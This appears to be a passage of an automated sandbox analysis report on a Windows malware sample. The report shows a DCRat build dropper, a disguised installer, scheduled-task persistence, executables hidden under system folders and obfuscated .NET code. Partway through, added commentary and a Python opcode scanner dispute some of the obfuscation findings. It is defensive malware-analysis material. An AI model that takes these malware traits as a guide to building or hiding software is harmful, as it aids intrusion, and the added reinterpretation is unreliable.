Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\gorkmTnChA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Directory created: C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Directory created: C:\Program Files\Uninstall Information\98135c31e34d63
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Directory created: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe
Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe Directory created: C:\Program Files\Windows NT\Accessories\en-GB\98135c31e34d63
Source: gorkmTnChA.exe Static file information: File size 9843712 > 1048576
Source: gorkmTnChA.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x961200
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: gorkmTnChA.exe, DCRatBuild.exe.0.dr
                                    Source: Binary string: wininet.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732315055.000000000503A000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: C:\NetFXDev1\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb source: gorkmTnChA.exe
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb| source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, ShortcutFlags.dll.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb@ source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, ShortcutFlags.dll.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ResourceCleaner.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp
                                    Source: Binary string: wininet.pdbUGP source: SandeLLoCHECKER_Installer.exe, 00000003.00000003.1732315055.000000000503A000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, MSI4DB5.tmp.7.dr, MSI44B9.tmp.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbl source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, MSI4DB5.tmp.7.dr, MSI44B9.tmp.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.0000000006170000.00000002.00000010.00040000.0000001B.sdmp, lzmaextractor.dll.3.dr, SandeLLoCHECKER_Installer.msi.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: SandeLLoCHECKER_Installer.exe, 00000003.00000002.2902345730.00000000062BA000.00000002.00000010.00040000.0000001B.sdmp, MSI4969.tmp.7.dr, MSI43FC.tmp.3.dr
                                    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: gorkmTnChA.exe
                                    Source: Binary string: -C:\NetFXDev1\binaries\x86ret\bin\i386\VSSetup\Utils\boxstub.pdb source: gorkmTnChA.exe

                                    Data Obfuscation

                                    Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.cs.Net Code: Type.GetTypeFromHandle(VONH6ZRBck0LT59jToQ.XQJEphIDm9P(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(VONH6ZRBck0LT59jToQ.XQJEphIDm9P(16777246)),Type.GetTypeFromHandle(VONH6ZRBck0LT59jToQ.XQJEphIDm9P(16777260))})
                                    Source: shi436E.tmp.3.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0084F620 RoGetActivationFactory,LoadLibraryW,GetProcAddress,RoGetActivationFactory,LoadLibraryW,GetProcAddress,RoGetActivationFactory,LoadLibraryW,GetProcAddress,FreeLibrary,3_2_0084F620
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\bridgeMonitorDhcpCommon\__tmp_rar_sfx_access_check_4793781Jump to behavior
                                    Source: DCRatBuild.exe.0.drStatic PE information: section name: .didat
                                    Source: shi436E.tmp.3.drStatic PE information: section name: .wpp_sf
                                    Source: shi436E.tmp.3.drStatic PE information: section name: .didat
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AF640 push ecx; ret 1_2_004AF653
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004AEB78 push eax; ret 1_2_004AEB96
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3A88D push ebx; ret 3_3_00E3A89F
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3A88D push ebx; ret 3_3_00E3A89F
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB60 pushad ; retf 3_3_00E3CB61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB60 pushad ; retf 3_3_00E3CB61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB60 pushad ; retf 3_3_00E3CB61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB60 pushad ; retf 3_3_00E3CB61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF60 pushad ; iretd 3_3_00E3CF61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF60 pushad ; iretd 3_3_00E3CF61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF60 pushad ; iretd 3_3_00E3CF61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF60 pushad ; iretd 3_3_00E3CF61
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB64 pushad ; retf 3_3_00E3CB65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB64 pushad ; retf 3_3_00E3CB65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB64 pushad ; retf 3_3_00E3CB65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CB64 pushad ; retf 3_3_00E3CB65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF64 pushad ; iretd 3_3_00E3CF65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF64 pushad ; iretd 3_3_00E3CF65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF64 pushad ; iretd 3_3_00E3CF65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF64 pushad ; iretd 3_3_00E3CF65
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_3_00E3CF68 push 6800E3CFh; iretd 3_3_00E3CF6D
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe Code function: 3_3_00E3CB68 push 6800E3CBh; retf 3_3_00E3CB6D
Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe Code function: 3_3_00E3CB50 push eax; retf 3_3_00E3CB51
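The pushad/push/retf/iretd sequences above are the sandbox's evidence for a call/push/ret obfuscation signature, but the opcodes themselves point the other way. `push 6800E3CFh` at 3_3_00E3CF68 encodes as the bytes 68 CF E3 00 68, so the little-endian dword stored at 0x00E3CF68 is 0x00E3CF68, the address of the instruction itself; `push 6800E3CBh` at 3_3_00E3CB68 likewise stores the dword 0x00E3CB68. A dword that holds its own address is the shape of an initialized list head or pointer table, not of executable code, which suggests the disassembler walked data. The following scanner is an added example (my code, not Joe Sandbox's) that finds the same opcode patterns in a buffer and, for each hit, checks whether the dword at that address is a pointer into the scanned region. The sample buffer is constructed from the opcodes the report shows; the two bytes after each 60 CF pair are not on the page and are assumed to be E3 00 so the dwords read as addresses in the same region.

```python
from __future__ import annotations
import struct
from dataclasses import dataclass

# Two-byte opcode sequences behind the report's "pushad ; iretd" style hits.
# "push imm32 ; retf/iretd" carries a 4-byte immediate and is matched separately.
TWO_BYTE_PATTERNS = {
    b"\x60\xcf": "pushad ; iretd",
    b"\x60\xcb": "pushad ; retf",
    b"\x50\xcb": "push eax ; retf",
}


@dataclass
class Hit:
    addr: int
    mnemonic: str
    pointer_like: bool  # the dword at addr is an address inside the region


def scan(buf: bytes, base: int, region: tuple[int, int] | None = None) -> list[Hit]:
    """Find the flagged opcode sequences in buf (loaded at base) and tag each
    hit whose first dword points into region (default: the buffer itself)."""
    lo, hi = region if region else (base, base + len(buf))
    hits: list[Hit] = []
    off = 0
    while off < len(buf) - 1:
        mnemonic = TWO_BYTE_PATTERNS.get(buf[off:off + 2])
        if mnemonic is None and buf[off] == 0x68 and off + 6 <= len(buf):
            imm = struct.unpack_from("<I", buf, off + 1)[0]
            tail = buf[off + 5]
            if tail in (0xCB, 0xCF):
                mnemonic = f"push {imm:08X}h ; {'retf' if tail == 0xCB else 'iretd'}"
        if mnemonic is not None:
            pointer_like = False
            if off + 4 <= len(buf):
                dword = struct.unpack_from("<I", buf, off)[0]
                pointer_like = lo <= dword < hi
            hits.append(Hit(base + off, mnemonic, pointer_like))
        off += 1
    return hits


# Constructed sample laid out from the opcodes the report shows at
# 3_3_00E3CF60 (60 CF), 3_3_00E3CF64 (60 CF) and 3_3_00E3CF68 (68 CF E3 00 68 CF).
# The bytes after each 60 CF pair are not on the page; E3 00 is an assumption.
SAMPLE_BASE = 0x00E3CF60
SAMPLE = bytes.fromhex("60CFE300" "60CFE300" "68CFE30068CF" "0000")


def triage(buf: bytes, base: int) -> list[tuple[str, str, bool]]:
    """Human-readable view: (address, mnemonic, dword-is-a-pointer)."""
    return [(f"{h.addr:08X}", h.mnemonic, h.pointer_like) for h in scan(buf, base)]


if __name__ == "__main__":
    for addr, mnem, ptr in triage(SAMPLE, SAMPLE_BASE):
        print(addr, mnem, "<- dword is a pointer into the region" if ptr else "")
```

Every hit in the constructed sample comes back pointer_like, while the same pattern inside a normal prologue (`push ebp; mov ebp, esp; pushad; retf`) does not; a hit that is also a self-referential pointer should be read as data before it is counted as obfuscation.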
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, abDY9GRGyg7f4yrWnjk.cs High entropy of concatenated method names: 'kpRPpwwKqWG', 'Wn4PpiPC6GN', 'RwCPpnmA2AR', 'b8SPpDd8hTh', 'lsAPp0qG7E3', 'faFPpSmrjq2', 'HJsPpuHx8Vp', 'rFSsglSHDe', 'mLAPpKnUNSw', 'HgIPpYUTfQD'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, znkgM3cwPre93RMCK8F.cs High entropy of concatenated method names: 'eqUc01u8N6', 'wd8qoLPJLnRNIq6lhauL', 'CNUUbYPJtQfqB9XSVLRR', 'sa5M5WPJ9c23Q6xcFdJE', 'U4ajoYPJGKCjg5pPw8Z0', 'HdAcnQoTcE', 'trKYPfPJf3WV40X6vyZm', 'Mqbh5JPJdtfUHY8SEoNr', 'PSF757PJr9GI16xPYsCG', 'pNUeJePJMZQdNv1CWhFL'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, ziySaMVDCdNjkOtZs2x.cs High entropy of concatenated method names: 'LXrVRKU7wo', 'LvjVsFdhyP', 'a2rVzWFmGY', 'B1D1ZpPOW8VYE8A6XTOX', 'YRGewlPFsuVBfjKEP6c0', 'rJrG26PFzhuneue8FnsQ', 'K3mmbHPOPDNUKlIuhrtj', 'NBxVSBouA6', 'RqpVuOAGrX', 'eS7VKDJmOn'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, m4c2PUPK5NOdm1GvelW.cs High entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'n25PyNVLD2w', 'QVHPcnQW3if', 'YMQ3DFP5F55ZpMn7A3cS', 'hFm5pTP5OJ122y90bpwN', 'RLqVTJP5lDL2E3XrtGpB'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, KFhDdQXl4CTqNpWnehx.cs High entropy of concatenated method names: 'QNxXeCgKjk', 'GsvXwAt1Zh', 'cHJXiJ1qkM', 'WZYk5HPrdOhGsPEs9B84', 'wYyKlZPraQ9B5H59FyCY', 'yCEL5mPrMyOESSKoD6YZ', 'nbSEJhPrf0nFTIUuNYk6', 'mygXMocUXg', 'x5UXfInAx7', 'MR2XdHQjGT'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, ewK7Ahjg5iZ7ySTcASH.cs High entropy of concatenated method names: 'gMAjTjnZJa', 'vpscK7PdcFMMhDAv8P43', 'fHOqOmPdPJrSQ4ZO1msf', 'VbLDkePdE5fFKdBPDfPe', 'NUiswePdV2Ocg789SIyg', '_53Y', 'd65', 'HwyPV3xxC8E', 'n8sPVAnoDWQ', 'r1mPyOkiMh9'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, sVBTcKcRE6Eyar98VXX.cs High entropy of concatenated method names: 'NryVHQx4RV', 'OCwfVQPFHtKo1MUOdfOB', 'SQwSEHPFI5UfwJpInuxy', 'NA6o3tPF7RAJp6APn8fr', 'fiUcigPFTejtculTI4MQ', 'r33OtPPFNlXJ3j2wjBO6', 'MwpDvdPFBvPpx8tHDrwx', 'xFRkoXPFhjKYubQGspwv', 'dYnVmvXQRu', 'ElWr9IPFmgvM7V06Glwc'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, jVT1kEbpryENVM7Vo5g.cs High entropy of concatenated method names: 'EUVBL6PaqfhRrXmCrP9Z', 'InDJgUPa1T6WanV9Z6Dq', 'avYUhnPa5FwOmJDnfFZS', 'AKexRnPaAIxlomGsj1bt', 'DolsqwPa2D3IaZjhDZ1n', '_7kT', '_376', 'fEhby9keH6', 'ua7bgtG1rN', '_4p5'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, odxcbTFWONU0d3tHtVr.cs High entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, T1AIQcB28mfR3LUeL3B.cs High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, Eo0VmvJcV1IdMO2pbfQ.cs High entropy of concatenated method names: 'Qe6JxfWSJV', 'TeQJpj9esO', '_7Bm', 'LNDJXm8FIg', 'kLJJyCCOBC', 'G29JgD5Ixo', 'pZWJjQTkCy', 'qifL12PwupQtTr7bsca0', 'EFYtRsPw0oxqXQ5naeJs', 'H23ma1PwSC6QmKkGvCkZ'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, k5jFZW5jR0PyX7ZoCXu.cs High entropy of concatenated method names: 'uGR5UWORiN', 'wMF57j2O35', 'q5x5TgdsNU', 'KBOOUePe7Tkvv9fb7dFE', 'dw9B8nPeb2yqP5ilhaEJ', 'Ad9wByPeUVCAuLhQtpwm', 'Qd15U8PeTi7w8mdVyDE1', 'SkELHtPeHgclDGmlvfL0', 'XQZSi3PeIavsgSj94h19'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, E2qdPJSsFMI7QjjsXIL.cs High entropy of concatenated method names: 'QkFuEdO0li', 'X85ucnjoiq', 'fSUxg4PRWrbcrF3xXKBa', 'hd73UjPRPUST8HivVJBd', 'KVm6KRPCsuUtpSi0DFDl', 'ecIebQPCzVh80IYxZeId', 'UfXuP7PRExPssbfcOq4r', 'p4hrjGPRcTdQeYiJOMxM', 'TgVuWJ3OYr', 'I92KgfPCYhjunGqjvZVM'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, RjVcLHVtj4BmWPjJctG.cs High entropy of concatenated method names: 'kGEViiAoU3', 'vUaOdtPFDR8opQY1WdDd', 'SfvMhOPFint7Bjg8k7c5', 'Tn2xwDPFnDm3Sry5Y7oK', 'temqQvPF05AJhlQ3Hdmc', 'tmkVLW7o5Z', 'YHcVGMxuyv', 'r7oV66LpEi', 'MZfDv4PFo2kW5C7u4xXc', 'RsfNqmPFGj9voBjiXnA9'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, LIEeeIHN5SZITMIosm7.cs High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'sv8Hk9DpOF', '_947', 'CtZHZ1Jg5Z', 'aWfHm0t6qN', '_1f8', '_71D'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, q3Tm1V84cgFceQ7t8Y5.cs High entropy of concatenated method names: 'zgN89Ztk9c', 'FCd8LLjGaa', 'Uoj8GKrZoC', 'Plj86DZ9CO', 'PoC8oimu9w', 'XKX8eMafSL', '_4tg', 'wk8', '_59a', '_914'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, gWCxaAcMGFMN0bdFKIJ.cs High entropy of concatenated method names: 'eMAcdCZdNm', 'IuqcawAU8C', 'cDCc4i5LVc', 'J9cctobX3P', 'eWGc9U273p', 'jFWcLEK0nN', 'nbicGn8gJr', 'mmkc6Gh1fn', 'uOXco44UNm', 'xQlcecXoHi'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, t1h4gDEGW5hhlnIG4Bn.cs High entropy of concatenated method names: 'mxSERPWWWn', 'YGtEsA30L1', 'jcnEznQtrJ', 'C6tqScP8edugARUoHwPG', 'CVeiFEP8wPR73wACaTQO', 'L5DTBuP86nasEG1bV007', 'CQAEmwP8orWhdsSMHMYG', 'AKbcxyAofY', 'uymOZyP80275E8qpLBy7', 'ndmLfOP8nx7K1PBaeSBn'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, ErgUfTgFXGMiHiP2RAN.cs High entropy of concatenated method names: 'NwbgtrQkhe', 'nT56laPfAqvRcLf3eUTA', 'DJiVw4PfmVgqTwZ9JLZt', 'OeliAKPf3CY0lkp7este', 'CU0qHVPf2nLV8dUWAYgo', 'UU8', 'd65', 'tVHPVTtcZKl', 'KXhPVHOucYS', 'QrlPy1udXr8'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, gQYGIKTODJoiO1YPjEb.cs High entropy of concatenated method names: 'j9l', 'D5ZTrucWDm', 'VSeTMFTT1y', 'kiFTfq9yxH', 'QLLTdM47LM', 'LTiTaVm6O4', 'zHoT4HdlLg', 'XQtKhUP4MgQIIA5N2XIy', 'FRnFwxP4leBbNDhLqjyG', 'kTw5EdP4roCqkr9bYKca'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, kLZ2jNJdu5Ruburi3qv.cs High entropy of concatenated method names: 'eywJ4ltW31', 'nSaJteT9Wg', 'RlAJ9Kf5ci', 'pICJLfKNO4', 'qb5JGsJPSd', 'PmVeXMPidnNDGqUx1XFB', 'ylRGZfPiasr8yGmlRPhL', 'xjLMYMPi4sXuLjNOU3Bu', 'Q2cFUpPiMmOKs7ChjGXl', 'h4LhC8Pifp14Th9el0va'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, ldcjMbmf4ptGYfkC3Je.cs High entropy of concatenated method names: 'P7g122df8q', 'ceE1qhQxM1', 'qPWN2lPo4I0seI3vyEQh', 'y4SjjAPodekMa36nYrO9', 'r1cNCfPoaAWRrq2hSCb4', 'i26lrCPotBebOCZaNqDE', 'fkxFWYPo9fvgKL0hP91w', 'CQM1O5Ja4o', 'Jau3RkPooMPoVapmkkXI', 'W8QVtCPoG1HmP54dmbtA'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, kWL9fquUKMDEWs65kHS.cs High entropy of concatenated method names: 'jCHuTmWEi4', 'OQmuHTuHoa', 'J9RuIHhju6', 'hYIuvLxZ9J', 'rHTuBvMdwm', 'EEKuhacLnA', 'nwgwSiPRbgyxEak2IpPd', 'gtG0tePRUmoeik0rhH8E', 'sWcQSwPR7nAsYAH58FEt', 'VYJG9LPRT4WnfEAo7f80'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, REpan950nVEFhCln2AL.cs High entropy of concatenated method names: 'j8w5ubdp9T', 'mLi5KU2ndq', 'AnJ5Yd5Bvc', 'k4I5CAUbLS', 'ylV5RbpwIm', 'x135sZ0q3P', 'P4i5zTX7LM', 'HBI8WoJ5vO', 'xsx8PLkffS', 'BQI8EXswef'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, yUF9uLX3XgOu2HkrcHa.cs High entropy of concatenated method names: 'BhNXJGJQ6s', 'zoqteIPrNnbRUoSjcdSk', 'DCoVM7PrQrpoT7kVpMR1', 'zVZja3PrBBaGS2ug3b7B', 'eWowTJPrh3UgLyoktxxH', 'oV9Ne5Prk45QHhpukcPr', 'cRdX2nHdRG', 'fN0N0BPr7sh7xUU9tbBY', 'GQQ7v6PrTpLEXBpuLoOA', 'FMCBmsPrHaowKlFFUS1k'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, qx5yHtEIt4HuZnlhHCm.cs High entropy of concatenated method names: 'CisEBhunfP', 'LeOEhLwvEF', 'z9mJLxP5skMg0dJu8iu2', 'HW9xLgP5Ct9ukOiwi62Y', 'MetWpuP5RRFiShsmVxBr', 'p1O1umP5z9q1hyP6bCPe', 'aQP6EfP8WrM4pKbfAuAK', 'Es3N5eP8PLvASwdEHVaJ', 'Qe2DEZP8EoyRFFJLbige', 'wMasd9P8cBhjepL13jaZ'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, eSZhVpbJOTK8i2QFxuQ.cs High entropy of concatenated method names: 'eCd7NnHBb2', 'EZvAoePaKYqdemwX4xU8', 'EAJhSBPaYraAKa3noXA3', 'XbIlKLPaCsvVBvnlE04e', 'IgNlNwPaREwKvrtCTVei', 'veFbOsFfyE', 'Vy7blM5ZVj', 'hP6brbjrSN', 'pDHbMEfyng', 'mTMbfyCXW6'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, vWskwO58ujX1sV0cH8T.cs High entropy of concatenated method names: 'r4D5FC5mkA', 'aiGeqgPefUVA0q35gHxK', 'ehpSHFPerkVC03Tp229d', 'QKFTsyPeMOpIMdLgZvUV', 'wxU6dmPedEjWar5bu3tK', 'ik9AAIPeaXgKYqObOyuF', 'oItMvjPe4LmAC748YHTn', 'guKOXoPetRyTK13Dfkwk'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, N7ZmkdYkpvQgcoR6wdi.cs High entropy of concatenated method names: 'TIZyO7PRwFRIK9mYUKnO', 'frsROhPRiFheONIBp5UF', 's9CCCig2eG', 'o2f7OYPRSws2MAsGFKZ0', 'GXuOMOPRu5n2JKEGEU5Q', 'I7NjNTPRKLAio12PbE8P', 'HItLcyPRYVpZbkMYA3Ab', 'dbNaALPRC7dStIJxtrBK', 'u5nu6bPRRXei5JTmKQ0E', 'JIAsMdPRsEt3FBVaUy0a'
Source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, SG1yZQgm39el4bWZosj.cs High entropy of concatenated method names: '_64Z', 'd65', 'KspPy2Q3gPv', 'QdTPVWV2OZ4', 'nOJgAHtLos', 'xls5oZPfxmlQ7qJZeef1', 'mZTsm5PfptnLqDpDELI7', 'uCIE25PfXsRSDNZatNew', 'IdrZuMPfyf0xKvLUAioR', 'iApkJiPfgexQFVBbHFG4'
